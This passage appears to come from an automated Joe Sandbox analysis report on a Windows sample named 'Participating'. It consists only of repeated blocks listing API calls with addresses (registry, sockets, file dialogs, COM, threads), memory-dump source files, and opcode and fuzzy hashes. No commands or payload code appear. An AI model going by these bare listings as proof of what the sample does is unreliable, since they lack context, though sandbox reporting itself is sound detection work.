• Associated: 0000000B.00000002.2642495169.0000000000CE0000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.2642897706.0000000000D7D000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.2642897706.0000000000DA3000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.2643098350.0000000000DAD000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.2643199129.0000000000DB5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_ce0000_Participating.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: MessageSend$CreateObjectStockWindow
                                                                                                                                                                                                                                                                  • String ID: Msctls_Progress32
                                                                                                                                                                                                                                                                  • API String ID: 1025951953-3636473452
                                                                                                                                                                                                                                                                  • Opcode ID: 12f05047f39cee27e325ab7bcbe156cd44267492a1bf90af131b32eb4fabcb01
                                                                                                                                                                                                                                                                  • Instruction ID: a9c08df20daf61bb651b39bdc604539a15f51605cd27d490d4dbfca334031a77
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 12f05047f39cee27e325ab7bcbe156cd44267492a1bf90af131b32eb4fabcb01
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 251193B2140219BEEF119E65CC85EE77FADEF08758F018110BA08E2090DB72DC219BB0
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                    • Part of subcall function 00D1DB23: _free.LIBCMT ref: 00D1DB4C
                                                                                                                                                                                                                                                                  • _free.LIBCMT ref: 00D1DBAD
                                                                                                                                                                                                                                                                    • Part of subcall function 00D12D38: RtlFreeHeap.NTDLL(00000000,00000000,?,00D1DB51,00DB1DC4,00000000,00DB1DC4,00000000,?,00D1DB78,00DB1DC4,00000007,00DB1DC4,?,00D1DF75,00DB1DC4), ref: 00D12D4E
                                                                                                                                                                                                                                                                    • Part of subcall function 00D12D38: GetLastError.KERNEL32(00DB1DC4,?,00D1DB51,00DB1DC4,00000000,00DB1DC4,00000000,?,00D1DB78,00DB1DC4,00000007,00DB1DC4,?,00D1DF75,00DB1DC4,00DB1DC4), ref: 00D12D60
                                                                                                                                                                                                                                                                  • _free.LIBCMT ref: 00D1DBB8
                                                                                                                                                                                                                                                                  • _free.LIBCMT ref: 00D1DBC3
                                                                                                                                                                                                                                                                  • _free.LIBCMT ref: 00D1DC17
                                                                                                                                                                                                                                                                  • _free.LIBCMT ref: 00D1DC22
                                                                                                                                                                                                                                                                  • _free.LIBCMT ref: 00D1DC2D
                                                                                                                                                                                                                                                                  • _free.LIBCMT ref: 00D1DC38
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2642567968.0000000000CE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00CE0000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642495169.0000000000CE0000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642897706.0000000000D7D000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642897706.0000000000DA3000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2643098350.0000000000DAD000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2643199129.0000000000DB5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_ce0000_Participating.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: _free$ErrorFreeHeapLast
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID: 776569668-0
                                                                                                                                                                                                                                                                  • Opcode ID: 98b13fc91f4fe31fecb0273d364a71dd69e1171f55120a532e903f65f4669862
                                                                                                                                                                                                                                                                  • Instruction ID: f205760be3b05750190d1b9f9edd8dccbd4957dc35df12aa67fc36f8cfe0b4e8
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 98b13fc91f4fe31fecb0273d364a71dd69e1171f55120a532e903f65f4669862
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: DB1151B2546B04BAD520BBB0ED07FDB77EDDF04700F410C19B2AAAA152DF75B69486B0
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • GetModuleHandleW.KERNEL32(00000000,?,?,00000100,00000000), ref: 00D4E328
                                                                                                                                                                                                                                                                  • LoadStringW.USER32(00000000), ref: 00D4E32F
                                                                                                                                                                                                                                                                  • GetModuleHandleW.KERNEL32(00000000,00001389,?,00000100), ref: 00D4E345
                                                                                                                                                                                                                                                                  • LoadStringW.USER32(00000000), ref: 00D4E34C
                                                                                                                                                                                                                                                                  • MessageBoxW.USER32(00000000,?,?,00011010), ref: 00D4E390
                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  • %s (%d) : ==> %s: %s %s, xrefs: 00D4E36D
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2642567968.0000000000CE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00CE0000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642495169.0000000000CE0000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642897706.0000000000D7D000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642897706.0000000000DA3000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2643098350.0000000000DAD000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2643199129.0000000000DB5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_ce0000_Participating.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: HandleLoadModuleString$Message
                                                                                                                                                                                                                                                                  • String ID: %s (%d) : ==> %s: %s %s
                                                                                                                                                                                                                                                                  • API String ID: 4072794657-3128320259
                                                                                                                                                                                                                                                                  • Opcode ID: 42b6526754134e3d1e2735a5565459346abf6caa5ade1319675a5427d742606a
                                                                                                                                                                                                                                                                  • Instruction ID: 75574174450361fbed0edf7fedb880052f1f8493708c71770a1e0d68f612957b
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 42b6526754134e3d1e2735a5565459346abf6caa5ade1319675a5427d742606a
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 69016DF29003087FE711ABA48D89EEA777CEB08301F404595B74AE6141FA749E848B71
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • InterlockedExchange.KERNEL32(?,?), ref: 00D51322
                                                                                                                                                                                                                                                                  • EnterCriticalSection.KERNEL32(00000000,?), ref: 00D51334
                                                                                                                                                                                                                                                                  • TerminateThread.KERNEL32(00000000,000001F6), ref: 00D51342
                                                                                                                                                                                                                                                                  • WaitForSingleObject.KERNEL32(00000000,000003E8), ref: 00D51350
                                                                                                                                                                                                                                                                  • CloseHandle.KERNEL32(00000000), ref: 00D5135F
                                                                                                                                                                                                                                                                  • InterlockedExchange.KERNEL32(?,000001F6), ref: 00D5136F
                                                                                                                                                                                                                                                                  • LeaveCriticalSection.KERNEL32(00000000), ref: 00D51376
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2642567968.0000000000CE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00CE0000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642495169.0000000000CE0000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642897706.0000000000D7D000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642897706.0000000000DA3000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2643098350.0000000000DAD000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2643199129.0000000000DB5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_ce0000_Participating.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: CriticalExchangeInterlockedSection$CloseEnterHandleLeaveObjectSingleTerminateThreadWait
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID: 3495660284-0
                                                                                                                                                                                                                                                                  • Opcode ID: 77c6bf086286f23d7e074a54060c64e294f176425e9e762713892ebb3af9217e
                                                                                                                                                                                                                                                                  • Instruction ID: 37d39d23d5185fef57cbea9d39e5499be411a3d75631078eaad89633a2e794b5
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 77c6bf086286f23d7e074a54060c64e294f176425e9e762713892ebb3af9217e
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 2CF0C932042712EBD7411B54EE49BD6BB3ABF04302F441121F50695DB19B7495A5CFA4
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • __WSAFDIsSet.WSOCK32(00000000,?,00000000,00000000,?,00000064,00000000), ref: 00D6281D
                                                                                                                                                                                                                                                                  • #17.WSOCK32(00000000,?,?,00000000,?,00000010), ref: 00D6283E
                                                                                                                                                                                                                                                                  • WSAGetLastError.WSOCK32 ref: 00D6284F
                                                                                                                                                                                                                                                                  • htons.WSOCK32(?,?,?,?,?), ref: 00D62938
                                                                                                                                                                                                                                                                  • inet_ntoa.WSOCK32(?), ref: 00D628E9
                                                                                                                                                                                                                                                                    • Part of subcall function 00D4433E: _strlen.LIBCMT ref: 00D44348
                                                                                                                                                                                                                                                                    • Part of subcall function 00D63C81: MultiByteToWideChar.KERNEL32(00000000,00000001,?,?,00000000,00000000,00000000,?,?,?,?,00D5F669), ref: 00D63C9D
                                                                                                                                                                                                                                                                  • _strlen.LIBCMT ref: 00D62992
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2642567968.0000000000CE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00CE0000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642495169.0000000000CE0000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642897706.0000000000D7D000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642897706.0000000000DA3000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2643098350.0000000000DAD000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2643199129.0000000000DB5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_ce0000_Participating.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: _strlen$ByteCharErrorLastMultiWidehtonsinet_ntoa
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID: 3203458085-0
                                                                                                                                                                                                                                                                  • Opcode ID: cefde41b2e2b3d60e78713df20324c4ff10b0e05d67705366ebe685afff76d2c
                                                                                                                                                                                                                                                                  • Instruction ID: d0aac77551e75bf42d07eff8dbb9eb4d689e52e5703b930af3f1b27af4094ba1
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: cefde41b2e2b3d60e78713df20324c4ff10b0e05d67705366ebe685afff76d2c
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 7AB1D231604740AFD324DF24C895F3A7BE5AF84318F58854CF49A4B2A2DB71ED46CBA1
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • __allrem.LIBCMT ref: 00D1042A
                                                                                                                                                                                                                                                                  • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00D10446
                                                                                                                                                                                                                                                                  • __allrem.LIBCMT ref: 00D1045D
                                                                                                                                                                                                                                                                  • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00D1047B
                                                                                                                                                                                                                                                                  • __allrem.LIBCMT ref: 00D10492
                                                                                                                                                                                                                                                                  • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00D104B0
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID: 1992179935-0
                                                                                                                                                                                                                                                                  • Opcode ID: f879b393e65d4db2631db90962c4ab5633f4520d067d5efed2ccc62c0ef88ee5
                                                                                                                                                                                                                                                                  • Instruction ID: 546623ace46784caf1254541afbbaec87061155df5149d293b78727e28250b44
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: f879b393e65d4db2631db90962c4ab5633f4520d067d5efed2ccc62c0ef88ee5
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: CC81E971600705BBD720BE68EC81BEA77A9EF55324F24412AF511D7681EFB0D9C087B4
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,?,00D08649,00D08649,?,?,?,00D167C2,00000001,00000001,8BE85006), ref: 00D165CB
                                                                                                                                                                                                                                                                  • MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,?,?,?,?,00D167C2,00000001,00000001,8BE85006,?,?,?), ref: 00D16651
                                                                                                                                                                                                                                                                  • WideCharToMultiByte.KERNEL32(00000001,00000000,00000000,00000000,?,8BE85006,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 00D1674B
                                                                                                                                                                                                                                                                  • __freea.LIBCMT ref: 00D16758
                                                                                                                                                                                                                                                                    • Part of subcall function 00D13B93: RtlAllocateHeap.NTDLL(00000000,?,?,?,00D06A79,?,0000015D,?,?,?,?,00D085B0,000000FF,00000000,?,?), ref: 00D13BC5
                                                                                                                                                                                                                                                                  • __freea.LIBCMT ref: 00D16761
                                                                                                                                                                                                                                                                  • __freea.LIBCMT ref: 00D16786
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: ByteCharMultiWide__freea$AllocateHeap
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID: 1414292761-0
                                                                                                                                                                                                                                                                  • Opcode ID: 4113127ee952e120c35ba2cb6f069d162a7e32db52daad82e98c83d85ae01b32
                                                                                                                                                                                                                                                                  • Instruction ID: 09411d1c23518c468e4f31f4d909adaf1598fcd64a31ca560f8fac088996331c
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 4113127ee952e120c35ba2cb6f069d162a7e32db52daad82e98c83d85ae01b32
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 8151C372600216BFEB259E64EC85EFA77AAEB40754B184669FD09D6180EF34DC90C6B0
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                    • Part of subcall function 00CEB329: _wcslen.LIBCMT ref: 00CEB333
                                                                                                                                                                                                                                                                    • Part of subcall function 00D6D3F8: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00D6C10E,?,?), ref: 00D6D415
                                                                                                                                                                                                                                                                    • Part of subcall function 00D6D3F8: _wcslen.LIBCMT ref: 00D6D451
                                                                                                                                                                                                                                                                    • Part of subcall function 00D6D3F8: _wcslen.LIBCMT ref: 00D6D4C8
                                                                                                                                                                                                                                                                    • Part of subcall function 00D6D3F8: _wcslen.LIBCMT ref: 00D6D4FE
                                                                                                                                                                                                                                                                  • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00D6C72A
                                                                                                                                                                                                                                                                  • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00D6C785
                                                                                                                                                                                                                                                                  • RegCloseKey.ADVAPI32(00000000), ref: 00D6C7CA
                                                                                                                                                                                                                                                                  • RegEnumValueW.ADVAPI32(?,-00000001,?,?,00000000,?,00000000,00000000), ref: 00D6C7F9
                                                                                                                                                                                                                                                                  • RegCloseKey.ADVAPI32(?,?,00000000), ref: 00D6C853
                                                                                                                                                                                                                                                                  • RegCloseKey.ADVAPI32(?), ref: 00D6C85F
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: _wcslen$Close$BuffCharConnectEnumOpenRegistryUpperValue
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID: 1120388591-0
                                                                                                                                                                                                                                                                  • Opcode ID: eb053378e7a07e3f089861ea4b564ffe7c5ed37016e69396126f4b1f1094ee18
                                                                                                                                                                                                                                                                  • Instruction ID: f3a601f4fbd1fb8ee3dd6f91d346e2298f35b0d404b069232810c74f0dd3de4a
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: eb053378e7a07e3f089861ea4b564ffe7c5ed37016e69396126f4b1f1094ee18
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: EA818C71218341AFC714DF25C885E2ABBE5FF84308F18955CF4998B2A2DB31ED45CBA2
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • VariantInit.OLEAUT32(00000035), ref: 00D400A9
                                                                                                                                                                                                                                                                  • SysAllocString.OLEAUT32(00000000), ref: 00D40150
                                                                                                                                                                                                                                                                  • VariantCopy.OLEAUT32(00D40354,00000000), ref: 00D40179
                                                                                                                                                                                                                                                                  • VariantClear.OLEAUT32(00D40354), ref: 00D4019D
                                                                                                                                                                                                                                                                  • VariantCopy.OLEAUT32(00D40354,00000000), ref: 00D401A1
                                                                                                                                                                                                                                                                  • VariantClear.OLEAUT32(?), ref: 00D401AB
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2642567968.0000000000CE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00CE0000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642495169.0000000000CE0000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642897706.0000000000D7D000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642897706.0000000000DA3000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2643098350.0000000000DAD000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2643199129.0000000000DB5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_ce0000_Participating.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: Variant$ClearCopy$AllocInitString
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID: 3859894641-0
                                                                                                                                                                                                                                                                  • Opcode ID: 24173a441273a18fe2d745c90e6bfabf8a592a822d45fa874bcb4bafa3b393a8
                                                                                                                                                                                                                                                                  • Instruction ID: f2c99aaf2b39f0a8a5a4d90594dd7a9e4ca835e2eebe960dd4f4f1a34b8c9d9f
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 24173a441273a18fe2d745c90e6bfabf8a592a822d45fa874bcb4bafa3b393a8
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 8151A835600310ABCF20AF64D8C9B29BBA5EF45310F249446EA0ADF2D6DBB4DC44DB76
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                    • Part of subcall function 00CE41EA: _wcslen.LIBCMT ref: 00CE41EF
                                                                                                                                                                                                                                                                    • Part of subcall function 00CE8577: _wcslen.LIBCMT ref: 00CE858A
                                                                                                                                                                                                                                                                  • GetOpenFileNameW.COMDLG32(00000058), ref: 00D59F2A
                                                                                                                                                                                                                                                                  • _wcslen.LIBCMT ref: 00D59F4B
                                                                                                                                                                                                                                                                  • _wcslen.LIBCMT ref: 00D59F72
                                                                                                                                                                                                                                                                  • GetSaveFileNameW.COMDLG32(00000058), ref: 00D59FCA
                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2642567968.0000000000CE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00CE0000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642495169.0000000000CE0000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642897706.0000000000D7D000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642897706.0000000000DA3000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2643098350.0000000000DAD000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2643199129.0000000000DB5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_ce0000_Participating.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: _wcslen$FileName$OpenSave
                                                                                                                                                                                                                                                                  • String ID: X
                                                                                                                                                                                                                                                                  • API String ID: 83654149-3081909835
                                                                                                                                                                                                                                                                  • Opcode ID: a1a5f59f8f92bcb223ba5b67d4c285462704ee500a1e9afd6c9b013176fd7ba4
                                                                                                                                                                                                                                                                  • Instruction ID: 60062100f734d6731218539bfa4d3fef00a31e350a37503817ad0c76154093e9
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: a1a5f59f8f92bcb223ba5b67d4c285462704ee500a1e9afd6c9b013176fd7ba4
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 5DE17E31604350DFDB24DF25C891A6AB7E5BF84314F04896DFC899B2A2DB31DD09DBA2
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • _wcslen.LIBCMT ref: 00D56F21
                                                                                                                                                                                                                                                                  • CoInitialize.OLE32(00000000), ref: 00D5707E
                                                                                                                                                                                                                                                                  • CoCreateInstance.OLE32(00D80CC4,00000000,00000001,00D80B34,?), ref: 00D57095
                                                                                                                                                                                                                                                                  • CoUninitialize.OLE32 ref: 00D57319
                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2642567968.0000000000CE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00CE0000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642495169.0000000000CE0000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642897706.0000000000D7D000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642897706.0000000000DA3000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2643098350.0000000000DAD000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2643199129.0000000000DB5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_ce0000_Participating.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: CreateInitializeInstanceUninitialize_wcslen
                                                                                                                                                                                                                                                                  • String ID: .lnk
                                                                                                                                                                                                                                                                  • API String ID: 886957087-24824748
                                                                                                                                                                                                                                                                  • Opcode ID: 0c9afcd7f21d28a5fc63b91c4a2affc12df8b546cf8b500ec313795c83ac1455
                                                                                                                                                                                                                                                                  • Instruction ID: ae86ff703ddf3773d98a6bb434a2da8b96d33a0aaab169c2c2c7833884b4801a
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 0c9afcd7f21d28a5fc63b91c4a2affc12df8b546cf8b500ec313795c83ac1455
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 04D15971508341AFC700EF25C88196BB7E8FF94704F54496DF999872A2DB71ED09CBA2
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                    • Part of subcall function 00CE249F: GetWindowLongW.USER32(00000000,000000EB), ref: 00CE24B0
                                                                                                                                                                                                                                                                  • BeginPaint.USER32(?,?,?), ref: 00CE1B35
                                                                                                                                                                                                                                                                  • GetWindowRect.USER32(?,?), ref: 00CE1B99
                                                                                                                                                                                                                                                                  • ScreenToClient.USER32(?,?), ref: 00CE1BB6
                                                                                                                                                                                                                                                                  • SetViewportOrgEx.GDI32(00000000,?,?,00000000), ref: 00CE1BC7
                                                                                                                                                                                                                                                                  • EndPaint.USER32(?,?,?,?,?), ref: 00CE1C15
                                                                                                                                                                                                                                                                  • Rectangle.GDI32(00000000,00000000,00000000,?,?), ref: 00D23287
                                                                                                                                                                                                                                                                    • Part of subcall function 00CE1C2D: BeginPath.GDI32(00000000), ref: 00CE1C4B
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2642567968.0000000000CE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00CE0000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642495169.0000000000CE0000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642897706.0000000000D7D000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642897706.0000000000DA3000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2643098350.0000000000DAD000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2643199129.0000000000DB5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_ce0000_Participating.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: BeginPaintWindow$ClientLongPathRectRectangleScreenViewport
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID: 3050599898-0
                                                                                                                                                                                                                                                                  • Opcode ID: 6bd0bd9b165adb89915f8191d7b03432e88e0fe64dc1590769f394431a6efe62
                                                                                                                                                                                                                                                                  • Instruction ID: 91d700a7b3c841e433a952806504e8a92e1b9b79b5b5a947959f6be894d02d73
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 6bd0bd9b165adb89915f8191d7b03432e88e0fe64dc1590769f394431a6efe62
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 9B41CD71104340EFDB20DF25DC84FBA7BA8EF55324F180668FAA9CA2A1D7309954DB72
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • InterlockedExchange.KERNEL32(?,000001F5), ref: 00D511B3
                                                                                                                                                                                                                                                                  • ReadFile.KERNEL32(?,?,0000FFFF,?,00000000), ref: 00D511EE
                                                                                                                                                                                                                                                                  • EnterCriticalSection.KERNEL32(?), ref: 00D5120A
                                                                                                                                                                                                                                                                  • LeaveCriticalSection.KERNEL32(?), ref: 00D51283
                                                                                                                                                                                                                                                                  • ReadFile.KERNEL32(?,?,0000FFFF,00000000,00000000), ref: 00D5129A
                                                                                                                                                                                                                                                                  • InterlockedExchange.KERNEL32(?,000001F6), ref: 00D512C8
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2642567968.0000000000CE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00CE0000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642495169.0000000000CE0000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642897706.0000000000D7D000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642897706.0000000000DA3000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2643098350.0000000000DAD000.00000004.00000001.01000000.00000007.sdmp
